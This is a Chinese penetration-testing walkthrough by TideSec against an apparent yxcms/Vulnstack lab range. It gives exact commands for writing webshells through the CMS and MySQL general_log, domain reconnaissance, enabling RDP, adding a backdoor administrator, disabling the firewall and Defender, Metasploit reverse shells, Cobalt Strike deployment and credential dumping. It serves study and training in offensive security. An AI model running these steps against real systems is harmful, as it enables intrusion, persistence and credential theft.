流程思路整理
信息收集
1、web指纹收集
2、主机指纹收集
3、搜索引擎语法
4、各漏洞平台提报的已存在漏洞
5、系统防护情况
6、资产企业、个人信息
漏洞利用
1、通过web模块功能【上传点、参数交互点【xss/sql/rce】、登录点】
2、安全设备的绕过手段
3、getshell【提权】
再来一波收集【web pc】
1、账号密码
2、主机信息
3、系统信息
内网收集
1、内网--继续信息收集
2、内网攻击姿势--信息泄露
3、内网攻击姿势-MS08-067
4、内网攻击姿势-SMB远程桌面口令猜测
5、内网攻击姿势-Oracle数据库TNS服务漏洞
6、内网攻击姿势-RPC DCOM服务漏洞
横向移动
1、内网其它主机端口-文件读取
2、内网其它主机端口-redis
3、内网其它主机端口-redis Getshell
4、内网其它主机端口-MySQL数据库
5、内网其它主机端口-MySQL提权
构建通道
1、内网其它主机端口-代理转发
持久控制
1、域渗透-域成员信息收集
2、域渗透-基础服务弱口令探测及深度利用之powershell
3、域渗透-横向移动[wmi利用]
4、域渗透-C2命令执行
5、域渗透-利用DomainFronting实现对beacon的深度隐藏
6、域渗透-域控实现与利用
痕迹清理
Web服务器:【通外网】
Windows7 64位 具备web站点
外网ip:172.16.111.111
内网ip:192.168.52.143
域内主机:【不通外网】
Win2K3 Metasploitable
内网ip:192.168.52.141
域控:
Windows 2008 【不通外网】
内网ip:192.168.52.138
通过百度搜索,cms的名称yxcms大量的相关数据。摘取到的重要信息有:
后台路径:index.php?r=admin
默认账号密码:admin/123456
后台有模块管理可用作写马【不涉及免杀】
这里改的是index_index.php。感觉是前台的入口文件什么的,主要是开发出身,真的是凭感觉。先让它输出几个2吧,验证一下自己的猜想,成功,少了目录扫描过程。
菜刀验证权限
这里来的是系统权限的账号,nice。
这里肯定还有其他方式进行提权,在百度搜到什么就用什么吧,时间关系,不做扩展了。
但是有一种写shell比较有意思,我们来试一下。通过翻查web路径下的目录,我们找到了一个phpmyadmin的东西,听说能getshell,我们也尝尝鲜,看看获得shell方式有哪些?
提权方式:
1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell
访问phpmyadmin,手动尝试弱口令登进来。
口令:root/root
show variables like '%secure%';
secure_file_priv 说明:
这个参数用来限制数据导入和导出操作的效果,例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。这些操作需要用户具有FILE权限。
1、如果这个参数为空,这个变量没有效果;
2、如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,MySQL服务不会创建它;
3、如果这个参数为NULL,MySQL服务会禁止导入和导出操作。这个参数在MySQL 5.7.6版本引入
开启全局日志记录
show variables like '%general%';
更改两个参数的属性
set global general_log=on;# 开启日志
set global general_log_file='C:/phpStudy/WWW/yxcms/tide.php';# 设置日志位置为网站目录
此时利用select进行shell
用之前的菜刀,看下目录是否存在这个文件,以及内容是什么?
同样这个也是可以连接的哈!!!
到这里,两种方式的getshell吧!
ipconfig /all # 查看本机ip,所在域
route print # 打印路由信息
net view # 查看局域网内其他主机名
arp -a # 查看arp缓存
net start # 查看开启了哪些服务
net share # 查看开启了哪些共享
net share ipc$ # 开启ipc共享
net share c$ # 开启c盘共享
net use \192.168.xx.xxipc$ "" /user:"" # 与192.168.xx.xx建立空连接
net use \192.168.xx.xxc$ "密码" /user:"用户名" # 建立c盘共享
dir 192.168.xx.xxc$user # 查看192.168.xx.xx c盘user目录下的文件
net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain # 查看有几个域
net user 用户名 /domain # 获取指定域用户的信息
net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain # 查看域中某工作组
net group "domain admins" /domain # 查看域管理员的名字
net group "domain computers" /domain # 查看域中的其他主机名
net group "doamin controllers" /domain # 查看域控制器(可能有多台)
菜刀链接执行系统命令回显乱码,这里通过菜刀上传冰蝎马。
收集到两台内网pc
开启的哪些服务
域信息:
通过上面的端口信息的确认,没有开启远程服务。现在开一下【第一命令有效】。
REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net start termservice
添加用户xiaoma/Ma123456 到管理组
net user xiaoma Ma123456 /add net localgroup administrators xiaoma /add
用此账号进行远程桌面连接。
可能开了防火墙。冰蝎反弹shell,关闭防火墙
use exploit/multi/handler set payload php/meterpreter/reverse_tcp show options
有个疑问,为什么要反弹shell.??????
有了命令执行,直接关闭防火墙
netsh advfirewall set allprofiles state off
查看防火墙配置
netsh advfirewall show allprofiles
用xiaoma账号登录下
关闭denfender net stop windefend 关闭杀毒软件 run killav
安装过程略。
cs生成exe,上传到web, start xxx.exe
成功上线,还是非常激动的,开心撒!!!
查看hash
获取密码 logonpasswords
此时我们已经获取到了administrator(域管理员)的明文密码——Ma123456
远程登录pc,查看有什么软件,有个nmap。可以用来扫描后面内网的主机漏洞,到此web主机就算搞定了。感觉有很多细节要完善,在下个章节,完成内网的另外的两台pc权限获取吧!!!
E
N
D
关
于
我
们
Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。
团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室,近三年来在网络安全技术方面开展研发项目60余项,获得各类自主知识产权30余项,省市级科技项目立项20余项,研究成果应用于产品核心技术研究、国家重点科技项目攻关、专业安全服务等。对安全感兴趣的小伙伴可以加入或关注我们。
本文作者:TideSec
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/157867.html